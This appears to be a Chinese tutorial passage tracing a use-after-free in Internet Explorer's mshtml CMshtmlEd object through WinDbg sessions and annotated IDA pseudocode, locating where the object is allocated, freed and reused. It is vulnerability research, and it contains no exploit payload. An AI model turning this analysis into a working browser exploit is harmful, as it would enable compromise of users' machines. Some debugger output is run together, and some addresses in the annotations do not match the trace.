mshtml!CDoc::NotifySelection+0x00000059    662247f1 mshtml!COmWindowProxy::SwitchMarkup+0x0000034866013685 mshtml!CDocument::open+0x00000426    66010ea1 mshtml!CDocument::write+0x0000007c    660c554e mshtml!Method_void_SAFEARRAYPVARIANTP+0x00000085    661ef10b mshtml!CBase::ContextInvokeEx+0x000005dc    661eef72 mshtml!CBase::InvokeEx+0x00000025    661fb7fa mshtml!DispatchInvokeCollection+0x0000014c    6619f00c mshtml!CDocument::InvokeEx+0x000000f0    6619bc52 mshtml!CBase::VersionedInvokeEx+0x00000020    6619bc0e mshtml!PlainInvokeEx+0x000000eb    6b56a26e jscript!IDispatchExInvokeEx2+0x00000104    6b56a1b9 jscript!IDispatchExInvokeEx+0x0000006a    6b56a43a jscript!InvokeDispatchEx+0x00000098    6b56a4e4 jscript!VAR::InvokeByName+0x00000139    6b57d9a8 jscript!VAR::InvokeDispName+0x0000007d    6b57da4f jscript!VAR::InvokeByDispID+0x000000ce    6b57e4c7 jscript!CScriptRuntime::Run+0x00002b80    6b575d7d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce    6b575cdb jscript!ScrFncObj::Call+0x0000008d    6b575ef1 jscript!CSession::Execute+0x0000015f    6b56f4c6 jscript!NameTbl::InvokeDef+0x000001b5

可以看到在 6621cd49 处调用的 HeapFree 将 esi 所指的对象 free 了

方法二:函数断点跟踪

打开HPA后触发崩溃

0:013> g(a40.bfc): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=0000001f ecx=05d72f30 edx=0000000d esi=00000000 edi=0705ef78eip=6899503e esp=0463996c ebp=04639978 iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206mshtml!CMshtmlEd::Exec+0x131:6899503e 8b7f08          mov     edi,dword ptr [edi+8ds:0023:0705ef80=????????

此时edi+8所指向对象无效,已经被释放,由于这是一个UAF漏洞,我们需要了解一下它的运行过程

  • 何时初始化

  • 何时释放

  • 何时使用——对已释放对象的使用就发生在崩溃处

我们查看一下这个对象的相关函数

0:005> x mshtml!CMshtmlEd::*6899352b mshtml!CMshtmlEd::Release=<no type information>689938cd mshtml!CMshtmlEd::QueryInterface=<no type information>688ba635 mshtml!CMshtmlEd::Initialize=<no type information>6890a5d9 mshtml!CMshtmlEd::AddRef=<no type information>6890a4c8 mshtml!CMshtmlEd::`vftable' =<no type information>68994ee2 mshtml!CMshtmlEd::IsDialogCommand=<no type information>688fe118 mshtml!CMshtmlEd::QueryStatus=<no type information>687716e3 mshtml!CMshtmlEd::GetSegmentList=<no type information>68994faf mshtml!CMshtmlEd::Exec=<no type information>688ba98d mshtml!CMshtmlEd::CMshtmlEd=<no type information>689acd5b mshtml!CMshtmlEd::~CMshtmlEd=<no type information>

由名字可推测Initialize、Release、CMshtmlEd 、~CMshtmlEd 与对象创建释放有关

我们首先在Initialize和Release处分别下一个断点,然后调试看看

0:000> bp mshtml!CMshtmlEd::Release0:000> bp mshtml!CMshtmlEd::Initialize0:013> gBreakpoint 0 hiteax=07a5af78 ebx=00000000 ecx=6890a4c8 edx=00051078 esi=057f8f8c edi=07a5eff0eip=6899352b esp=0474d418 ebp=0474d440 iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Release:68993528bff            mov     edi,edi

一开始便进入Release函数中,这一次应该是EXP代码中一开始的页面重绘,直接按g运行

0:005> gBreakpoint 1 hiteax=071bafd8 ebx=04998f20 ecx=00000000 edx=07a66f78 esi=07a66f78 edi=04998faceip=688ba635 esp=0474967ebp=0474968c iopl=0nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Initialize:688ba635 f6868400000002  test    byte ptr [esi+84h],2       ds:0023:07a66ffc=000:005> g 0x`688ba65beax=00000000 ebx=04998f20 ecx=03a29f30 edx=00000000 esi=07a66f78 edi=07a66f88eip=688ba65b esp=0474966ebp=0474968c iopl=0nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0x26:688ba65b ff1500137568    call    dword ptr [mshtml!_imp__HeapAlloc (68751300)] ds:0023:68751300={ntdll!RtlAllocateHeap (76e72dd6)}0:005> peax=07a68fc0 ebx=04998f20 ecx=76e75dd3 edx=00000000 esi=07a66f78 edi=07a66f88eip=688ba661 esp=04749678ebp=0474968c iopl=0nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0x2c:688ba661 85c0            test    eax,eax

接着便进入了 Initialize 函数,我们直接运行到 HeapAlloc 调用之后,此时 eax=07a68fc0,这就是 HeapAlloc 返回的空间地址。接着按 g,看后面哪里会释放这块内存

0:005> gBreakpoint 1 hiteax=071bafd8 ebx=04998f20 ecx=00000000 edx=080a4f78 esi=080a4f78 edi=047496c0eip=688ba635 esp=04749694ebp=047496a4 iopl=0nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Initialize:688ba635 f6868400000002  test    byte ptr [esi+84h],2       ds:0023:080a4ffc=000:005> g 0x`688ba661eax=08428fc0 ebx=04998f20 ecx=76e75dd3 edx=00000000 esi=080a4f78 edi=080a4f88eip=688ba661 esp=04749690ebp=047496a4 iopl=0nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0x2c:688ba661 85c0            test    eax,eax

这一次还是进入了Initialize函数,申请了eax=08428fc0,接着按g,进入到Release函数,一直按p到HeapFree函数

0:005eax=00000000 ebx=04998f8c ecx=00000000 edx=04998f8c esi=080a4f78 edi=00000001eip=689acd49 esp=04745aec ebp=04745afc iopl=0nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Release+0x1f:689acd49 ff15fc127568    call    dword ptr [mshtml!_imp__HeapFree (687512fc)] ds:0023:687512fc={kernel32!HeapFree (7555bbd0)}0:005> dd esp04745aec  0005000000000000080a4f78 080a4f7804745afc  04745b14 68bb0391 080a4f78 04998f2004745b0c  0000000004998fac 04745b40 68babd3a04745b1c  080a4f78 085b2fd8 000000000000000f04745b2c  04998f20 080a4f78 085b2fd8 08530fd804745b3c  078c6fd8 04745b48 68a2c0e7 04745b6404745b4c  689945c6 04998f20 00000000808ef3004745b5c  0000000005cd8680 04745b80 6894344e

释放的是080a4f78,我们直接在这个HeapFree这里下一个断点,方便调试,接着按g

直接就到了崩溃处

0:005> g(d94.b64): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=0000001f ecx=04998f30 edx=0000000d esi=00000000 edi=080a4f78eip=6899503e esp=047496f4 ebp=04749700 iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206mshtml!CMshtmlEd::Exec+0x131:6899503e 8b7f08          mov     edi,dword ptr [edi+8ds:0023:080a4f80=????????

被释放的地址(080a4f78)与前面 HeapAlloc 申请到的地址(08428fc0)不符,却直接到了崩溃处,说明我们的断点下错了:Initialize 里的 HeapAlloc 申请的并不是 CMshtmlEd 对象本身(对象 080a4f78 在进入 Initialize 时就已经在 esi 中了)。这时重新看一下 CMshtmlEd 构造函数

// IDA pseudocode of the CMshtmlEd constructor (mshtml.dll).
// a2 is the freshly HeapAlloc'ed 0x88-byte object (callers: AddCommandTarget /
// GetCommandTarget); a3 is the CHTMLEditor the callers pass in; a4 is a flag.
// NOTE(review): v4 (edx) is never assigned in this pseudocode -- the decompiler
// lost the register. The debugger traces above show the writes below landing in
// the object itself ([obj+4], [obj+8], [obj+84h]).
int __fastcall CMshtmlEd::CMshtmlEd(int a1, int a2, int a3, int a4)
{
  int v4; // edx@1

  *(_DWORD *)a2 = &CMshtmlEd::`vftable';   // +0: vtable -> a2 is the object pointer
  CSpringLoader::CSpringLoader((CSpringLoader *)(a2 + 24), (struct CMshtmlEd *)a2);
  *(_DWORD *)(v4 + 8) = a3;                 // +8: the CHTMLEditor; Exec reads it as [edi+8]
  *(_DWORD *)(v4 + 4) = 1;                  // +4: reference count, starts at 1; Release decrements it and frees the object at zero
  *(_DWORD *)(v4 + 132) ^= (*(_DWORD *)(v4 + 132) ^ 2 * (a4 != 0)) & 2;  // +0x84: bit 1 <- (a4 != 0); Initialize tests this bit
  return v4;
}

可见构造函数把CMshtmlEd的虚表写到了a2指向的地址,所以a2就是CMshtmlEd对象的指针

在IDA中按一个X,查看哪些函数引用了这个函数

浏览器漏洞利用实战

CHTMLEditor::AddCommandTarget

// IDA pseudocode. Allocates a zeroed 0x88-byte CMshtmlEd from the process heap,
// constructs it with a4-flag 0, stores it through a2, initializes it and appends
// it to a CImplPtrAry. Returns an HRESULT.
// NOTE(review): v6 and v9 are ecx at their call sites and appear unassigned here --
// register arguments the decompiler did not resolve; do not read them as values.
// The trace above shows the object allocated here (0601df78 on the second call)
// being freed in CMshtmlEd::Release and then dereferenced again by CMshtmlEd::Exec.
__int32 __userpurge CHTMLEditor::AddCommandTarget@<eax>(CHTMLEditor *this@<ecx>, int *a2@<eax>, struct IMarkupContainer *a3, struct CMshtmlEd **a4)
{
  int *v4; // edi@1
  LPVOID v5; // eax@1
  CMshtmlEd *v6; // ecx@1
  int v7; // esi@1
  __int32 result; // eax@4
  CImplPtrAry *v9; // ecx@4
  int v10// edi@5  (';' lost in the pasted listing)

  v4 = a2;
  v5 = HeapAlloc(g_hProcessHeap, 8u, 0x88u);   // 8 == HEAP_ZERO_MEMORY; 0x88 is sizeof(CMshtmlEd) as seen in !heap
  v7 = 0;
  if ( v5 )
    v7 = CMshtmlEd::CMshtmlEd(v6, (int)v5, (struct CHTMLEditor *)a3, 0);
  *v4 = v7;                                    // hand the new object back through a2
  if ( v7 )
  {
    result = CMshtmlEd::Initialize(v6);
    if ( result >= 0 )
    {
      v10 = *v4;
      result = CImplPtrAry::Append(v9);
    }
  }
  else
  {
    result = -2147024882;                      // 0x8007000E, E_OUTOFMEMORY
  }
  return result;
}

CHTMLEditor::GetCommandTarget 

// IDA pseudocode. Returns (through a3) a command target for a2.
// Two paths: if a2 does not expose IMarkupContainer (QueryInterface returns a
// failure HRESULT, i.e. nonzero), a temporary CMshtmlEd is heap-allocated with
// a4-flag 1, initialized and queried for IUnknown; otherwise the existing
// command-target list is searched and extended via AddCommandTarget.
// NOTE(review): v4, v5, v8 and v12 are ecx at their call sites and appear
// unassigned here -- register arguments the decompiler did not resolve.
__int32 __stdcall CHTMLEditor::GetCommandTarget(CHTMLEditor *this, struct IUnknown *a2, struct IUnknown **a3)
{
  IUnknownVtbl *v3; // eax@3
  CHTMLEditor *v4; // ecx@3
  CHTMLEditor *v5; // ecx@6
  __int32 v6; // edi@6
  __int32 v7; // eax@7
  CHTMLEditor *v8; // ecx@7
  __int32 v10// eax@18  (';' lost in the pasted listing)
  LPVOID v11; // eax@19
  CMshtmlEd *v12; // ecx@19
  int v13; // esi@20
  int (__stdcall ***v14)(_DWORD, _DWORD, _DWORD); // [sp+Ch] [bp-Ch]@1
  struct IMarkupContainer **v15; // [sp+10h] [bp-8h]@1
  struct IMarkupContainer *v16; // [sp+14h] [bp-4h]@1

  v15 = 0;
  v14 = 0;
  v16 = 0;
  if ( a2 && a3 )
  {
    v3 = a2->lpVtbl;
    v15 = 0;
    if ( v3->QueryInterface(a2, &IID_IMarkupContainer, &v15) )
    {
      // a2 is not a markup container: build a fresh CMshtmlEd (same 0x88-byte,
      // zero-initialized allocation as AddCommandTarget, but with a4 = 1)
      v11 = HeapAlloc(g_hProcessHeap, 8u, 0x88u);
      if ( v11 )
        v13 = CMshtmlEd::CMshtmlEd(v12, (int)v11, this, 1);
      else
        v13 = 0;
      if ( v13 )
      {
        v6 = CMshtmlEd::Initialize(v12);
        if ( v6 >= 0 )
        {
          // vtable slot 0: QueryInterface(IID_IUnknown) -> hands the object out via a3
          v6 = (**(int (__stdcall ***)(int, GUID *, struct IUnknown **))v13)(v13, &IID_IUnknown, a3);
          if ( v6 >= 0 )
            // vtable slot 2 (offset 8): Release -- presumably drops the constructor's
            // initial reference (+4 was set to 1), leaving the one QI added
            (*(void (__stdcall **)(int))(*(_DWORD *)v13 + 8))(v13);
        }
      }
      else
      {
        v6 = -2147024882;                    // 0x8007000E, E_OUTOFMEMORY
      }
    }
    else
    {
      if ( v16 )
        v16->lpVtbl->Release(v16);
      v16 = 0;
      v6 = CHTMLEditor::AdjustContainerCommandTarget(v4, (struct IMarkupContainer *)this, v15);
      if ( v6 >= 0 )
      {
        v7 = CHTMLEditor::FindCommandTarget(v5, v16, (struct CMshtmlEd **)&v14);
        v6 = v7;
        if ( v7 >= 0 )
        {
          // a result of 1 (presumably S_FALSE: no existing target) triggers
          // AddCommandTarget; the comma expression keeps its HRESULT in v6
          if ( v7 != 1
            || (v10 = CHTMLEditor::AddCommandTarget(
                        v8,
                        (int *)&v14,
                        (struct IMarkupContainer *)this,
                        (struct CMshtmlEd **)v16),
                v6 = v10,
                v10 >= 0) )
          {
            v6 = (**v14)(v14, &IID_IUnknown, a3);   // QueryInterface on the found/added target
          }
        }
      }
    }
  }
  else
  {
    v6 = -2147024809;                        // 0x80070057, E_INVALIDARG
  }
  if ( v16 )
    v16->lpVtbl->Release(v16);
  if ( v15 )
    // vtable slot 2 of the IMarkupContainer obtained above, i.e. Release (decompiler rendering)
    ((void (__stdcall *)(struct IMarkupContainer **))(*v15)[2].lpVtbl)(v15);
  return v6;
}

这两个函数都是先用HeapAlloc申请0x88字节的空间,然后把它传给CMshtmlEd的构造函数。我们在这两个函数以及前面的Initialize、Release两个函数处下断点,然后运行

0:000> bl0 e 67a4394f     0001 (0001)  0:**** mshtml!CHTMLEditor::GetCommandTarget1 e 6796a5d8     0001 (0001)  0:**** mshtml!CHTMLEditor::AddCommandTarget2 e 6796a635     0001 (0001)  0:**** mshtml!CMshtmlEd::Initialize3 e 67a4352b     0001 (0001)  0:**** mshtml!CMshtmlEd::Release0:000> g(56c.27c): Break instruction exception - code 80000003 (first chance)eax=7ff9e000 ebx=00000000 ecx=00000000 edx=772af125 esi=00000000 edi=00000000eip=772440f0 esp=088bf840 ebp=088bf86c iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246ntdll!DbgBreakPoint:772440f0 cc              int     30:013> gBreakpoint3 hiteax=08124f78 ebx=00000000 ecx=679ba4c8 edx=00211078 esi=07c64f8c edi=08128ff0eip=67a4352b esp=043cd748 ebp=043cd770 iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Release:67a4352b 8bff            mov     edi,edi0:005> peax=08124f78 ebx=00000000 ecx=679ba4c8 edx=00211078 esi=07c64f8c edi=08128ff0eip=67a4352d esp=043cd748 ebp=043cd770 iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Release+0x2:67a4352d 55              push    ebp0:005eax=08124f78 ebx=00000000 ecx=679ba4c8 edx=00211078 esi=07c64f8c edi=08128ff0eip=67a4352e esp=043cd744 ebp=043cd770 iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Release+0x3:67a4352e 8bec            mov     ebp,esp0:005eax=08124f78 ebx=00000000 ecx=679ba4c8 edx=00211078 esi=07c64f8c edi=08128ff0eip=67a43530 esp=043cd744 ebp=043cd744 iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Release+0x5:67a43530 56              push    esi0:005eax=08124f78 ebx=00000000 ecx=679ba4c8 edx=00211078 esi=07c64f8c edi=08128ff0eip=67a43531 esp=043cd740 ebp=043cd744 
iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Release+0x6:67a43531 8b7508          mov     esi,dword ptr [ebp+8ss:0023:043cd74c=08124f780:005eax=08124f78 ebx=00000000 ecx=679ba4c8 edx=00211078 esi=08124f78 edi=08128ff0eip=67a43534 esp=043cd740 ebp=043cd744 iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Release+0x9:67a43534 ff4e04          dec     dword ptr [esi+4]    ds:0023:08124f7c=000000010:005eax=08124f78 ebx=00000000 ecx=679ba4c8 edx=00211078 esi=08124f78 edi=08128ff0eip=67a43537 esp=043cd740 ebp=043cd744 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Release+0xc:67a43537 8b4604          mov     eax,dword ptr [esi+4ds:0023:08124f7c=000000000:005eax=00000000 ebx=00000000 ecx=679ba4c8 edx=00211078 esi=08124f78 edi=08128ff0eip=67a4353a esp=043cd740 ebp=043cd744 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Release+0xf:67a4353a 0f84fb970100    je      mshtml!CMshtmlEd::Release+0x11 (67a5cd3b) [br=1]0:005eax=00000000 ebx=00000000 ecx=679ba4c8 edx=00211078 esi=08124f78 edi=08128ff0eip=67a5cd3b esp=043cd740 ebp=043cd744 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Release+0x11:67a5cd3b e81b000000      call    mshtml!CMshtmlEd::~CMshtmlEd (67a5cd5b)0:005eax=00000000 ebx=00000000 ecx=00000000 edx=00211078 esi=08124f78 edi=08128ff0eip=67a5cd40 esp=043cd740 ebp=043cd744 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Release+0x16:67a5cd40 56              push    esi0:005eax=00000000 ebx=00000000 ecx=00000000 edx=00211078 esi=08124f78 edi=08128ff0eip=67a5cd41 
esp=043cd73c ebp=043cd744 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Release+0x17:67a5cd41 6a00            push    00:005eax=00000000 ebx=00000000 ecx=00000000 edx=00211078 esi=08124f78 edi=08128ff0eip=67a5cd43 esp=043cd738 ebp=043cd744 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Release+0x19:67a5cd43 ff351884d367    push    dword ptr [mshtml!g_hProcessHeap (67d38418)] ds:0023:67d38418=002100000:005eax=00000000 ebx=00000000 ecx=00000000 edx=00211078 esi=08124f78 edi=08128ff0eip=67a5cd49 esp=043cd734 ebp=043cd744 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Release+0x1f:67a5cd49 ff15fc128067    call    dword ptr [mshtml!_imp__HeapFree (678012fc)] ds:0023:678012fc={kernel32!HeapFree (763bbbd0)}0:005> dd esp043cd734  0021000000000000 08124f78 07c64f8c043cd744  043cd770 679dcfab 08124f78 07c64f20043cd754  00000000 67d3afd8 67a5ca26 67a5c9c3043cd764  0604b680 07c64f20 07c64f78 043cd78c043cd774  67a5c85c 00000000 67a5c83b 67a5c7f3043cd784  00000001 0604b680 043cd800 679bf212043cd794  07c64f20 67a22bab 00000001 0604b680043cd7a4  678e49c6 057d2fc8 00000000 0604b680

释放地址08124f78,在这个函数处下一个断点,方便调试,然后按g

0:005> gBreakpoint1 hiteax=0834efac ebx=00000001 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5d8 esp=043c99c0 ebp=043c99d4 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CHTMLEditor::AddCommandTarget:6796a5d8 8bff            mov     edi,edi0:005> peax=0834efac ebx=00000001 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5da esp=043c99c0 ebp=043c99d4 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x2:6796a5da 55              push    ebp0:005eax=0834efac ebx=00000001 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5db esp=043c99bc ebp=043c99d4 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x3:6796a5db 8bec            mov     ebp,esp0:005eax=0834efac ebx=00000001 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5dd esp=043c99bc ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x5:6796a5dd 53              push    ebx0:005eax=0834efac ebx=00000001 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5de esp=043c99b8 ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x6:6796a5de 8b5d08          mov     ebx,dword ptr [ebp+8ss:0023:043c99c4=0834ef200:005eax=0834efac ebx=0834ef20 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5e1 esp=043c99b8 ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x9:6796a5e1 56              push    esi0:005eax=0834efac ebx=0834ef20 ecx=00000000 
edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5e2 esp=043c99b4 ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0xa:6796a5e2 57              push    edi0:005eax=0834efac ebx=0834ef20 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5e3 esp=043c99b0 ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0xb:6796a5e3 6888000000      push    88h0:005eax=0834efac ebx=0834ef20 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5e8 esp=043c99ac ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x10:6796a5e8 6a08            push    80:005eax=0834efac ebx=0834ef20 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5ea esp=043c99a8 ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x12:6796a5ea ff351884d367    push    dword ptr [mshtml!g_hProcessHeap (67d38418)] ds:0023:67d38418=002100000:005eax=0834efac ebx=0834ef20 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5f0 esp=043c99a4 ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x18:6796a5f0 8bf8            mov     edi,eax0:005eax=0834efac ebx=0834ef20 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5f2 esp=043c99a4 ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x1a:6796a5f2 ff1500138067    call    dword ptr [mshtml!_imp__HeapAlloc (67801300)] ds:0023:67801300={ntdll!RtlAllocateHeap 
(77262dd6)}0:005eax=08051f78 ebx=0834ef20 ecx=77265dd3 edx=00000000 esi=0834ef20 edi=0834efaceip=6796a5f8 esp=043c99b0 ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x20:

AddCommandTarget中申请的地址08051f78,按g

0:005> gBreakpoint2 hiteax=07116fd8 ebx=0834ef20 ecx=00000000 edx=08051f78 esi=08051f78 edi=0834efaceip=6796a635 esp=043c99ac ebp=043c99bc iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Initialize:6796a635 f6868400000002  test    byte ptr [esi+84h],2ds:0023:08051ffc=000:005> peax=07116fd8 ebx=0834ef20 ecx=00000000 edx=08051f78 esi=08051f78 edi=0834efaceip=6796a63c esp=043c99ac ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0x7:6796a63c 8b08            mov     ecx,dword ptr [eax]  ds:0023:07116fd8=67d3caf00:005eax=07116fd8 ebx=0834ef20 ecx=67d3caf0 edx=08051f78 esi=08051f78 edi=0834efaceip=6796a63e esp=043c99ac ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0x9:6796a63e 57              push    edi0:005eax=07116fd8 ebx=0834ef20 ecx=67d3caf0 edx=08051f78 esi=08051f78 edi=0834efaceip=6796a63f esp=043c99a8 ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0xa:6796a63f 7551            jne     mshtml!CMshtmlEd::Initialize+0x64 (6796a692) [br=0]0:005eax=07116fd8 ebx=0834ef20 ecx=67d3caf0 edx=08051f78 esi=08051f78 edi=0834efaceip=6796a641 esp=043c99a8 ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0xc:6796a641 8d7e10          lea     edi,[esi+10h]0:005eax=07116fd8 ebx=0834ef20 ecx=67d3caf0 edx=08051f78 esi=08051f78 edi=08051f88eip=6796a644 esp=043c99a8 ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0xf:6796a644 57              push    
edi0:005eax=07116fd8 ebx=0834ef20 ecx=67d3caf0 edx=08051f78 esi=08051f78 edi=08051f88eip=6796a645 esp=043c99a4 ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0x10:6796a645 6860519c67      push    offset mshtml!IID_IMarkupContainer (679c5160)0:005eax=07116fd8 ebx=0834ef20 ecx=67d3caf0 edx=08051f78 esi=08051f78 edi=08051f88eip=6796a64a esp=043c99a0 ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0x15:6796a64a 50              push    eax0:005eax=07116fd8 ebx=0834ef20 ecx=67d3caf0 edx=08051f78 esi=08051f78 edi=08051f88eip=6796a64b esp=043c999c ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0x16:6796a64b ff11            call    dword ptr [ecx]      ds:0023:67d3caf0={mshtml!PlainQueryInterface (679cfbfd)}0:005eax=00000000 ebx=0834ef20 ecx=07cfcf30 edx=00000000 esi=08051f78 edi=08051f88eip=6796a64d esp=043c99a8 ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0x18:6796a64d 85c0            test    eax,eax0:005eax=00000000 ebx=0834ef20 ecx=07cfcf30 edx=00000000 esi=08051f78 edi=08051f88eip=6796a64f esp=043c99a8 ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0x1a:6796a64f 7c58            jl      mshtml!CMshtmlEd::Initialize+0x7b (6796a6a9) [br=0]0:005eax=00000000 ebx=0834ef20 ecx=07cfcf30 edx=00000000 esi=08051f78 edi=08051f88eip=6796a651 esp=043c99a8 ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             